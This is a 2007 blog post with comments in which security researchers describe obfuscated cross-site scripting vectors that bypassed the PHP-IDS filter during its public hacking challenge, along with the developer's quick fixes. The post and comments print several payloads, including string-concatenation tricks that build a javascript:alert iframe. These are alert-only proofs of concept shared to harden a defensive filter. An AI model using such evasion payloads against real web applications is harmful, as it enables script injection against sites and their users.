Saturday, September 01, 2007

7 minutes to kill a monster.

Well, a response time of one week is said to be good; Mozilla takes 10 f***ing days; Google, depending on the complexity of the vulnerability, takes between a day and a few weeks to fix one; but Mario Heiderich, developer of PHP-IDS, has an amazing turnaround of 7 minutes to push a patch for a vuln.

A week ago he told me about a "call for hacking" against PHP-IDS, and I said it would be really difficult, because the last time the filters were extremely strict. So I started playing (before the call for hacking was published), and within an hour I found 3 vectors and made a PoC of 666 bytes (that's why it's a monster xD); 2 of them were based on Giorgio Maone's window.name vector.

So I asked Mario whether I had to wait until the call for hacking was published, but he pushed the patch immediately.

A few minutes later I found another HTML vector ("style="anything), which was fixed too.

So he decided to interview me, as a prize for winning a contest that hadn't even started :P.

The vectors were:

  • open(name)
  • eval(name)
  • (1?(1?{a:1?""[1?"ev\a\l":0](1?"\a\lert":0):0}:0).a:0)[1?"\c\a\l\l":0](content,1?"x\s\s":0)

I'm sure that Gareth Heyes and Giorgio Maone will be the next to find some vectors :)

7 comments:

  1. Yeah, sent Mario a few :)

    Which he fixed in less than 10 mins!

    Stack overflow:
    arguments.callee(1)

    document write:
    writeln(1)

  2. Here's the biggy, now fixed of course :)

    s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i);

  3. hehe cool :D
    I'm surprised that createElement can be called directly.
    The parentElement.appendChild thing is pretty cool, I'll use it (for legitimate programming, of course, hehe).
    There's still an issue in the filters, but I haven't been able to turn it into a real vector; I'll try again later :P
    Greetz!!

  4. >>(for legitimate programming of course hehe)

    oh yes of course ;)

    Yep, string concatenation is their biggest problem as far as I can see. It must be very difficult to avoid false positives. Especially with the latest one I sent 'em.

    s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+'';u1=s1+s2+s3;URL=u1

  5. I sent Mario a hacking scratch doc to improve his string concatenation protection and he's updated the code now, so even the above is protected against. I'm impressed.

    Looks like we've got our work cut out now, Sirdarckcat :)

    Let's see who can get the next one ;)

  6. Hi Sirdarkcat,
    thanks for your kind invitation.
    I'm swamped with work as usual, but I thought it was nice
    to join the party for a little while ;)

  7. "string concatenation is their biggest problem as far as I can see"

    Yep - there are too many possible permutations to fix this problem forever, but I just added a new converter regex and most of the vectors you sent me are now detected properly. Unfortunately I couldn't decode all of the vectors you sent me - especially the one where the chaotic and the needed fragments were mixed together.

    We have similar problems when it comes to complex mathematical operations when assembling char code nodes (String.fromCharCode(10*E^10/10*E^9+100)) etc. - luckily those problems can be labeled as luxury problems, because it's not very likely to find a site where you can inject JavaScript directly between script tags without any breaker. At least I hope so ;)

    @Giorgio: Cool ones ;) Will take care of them next.

    Greetings && thx!
    .mario
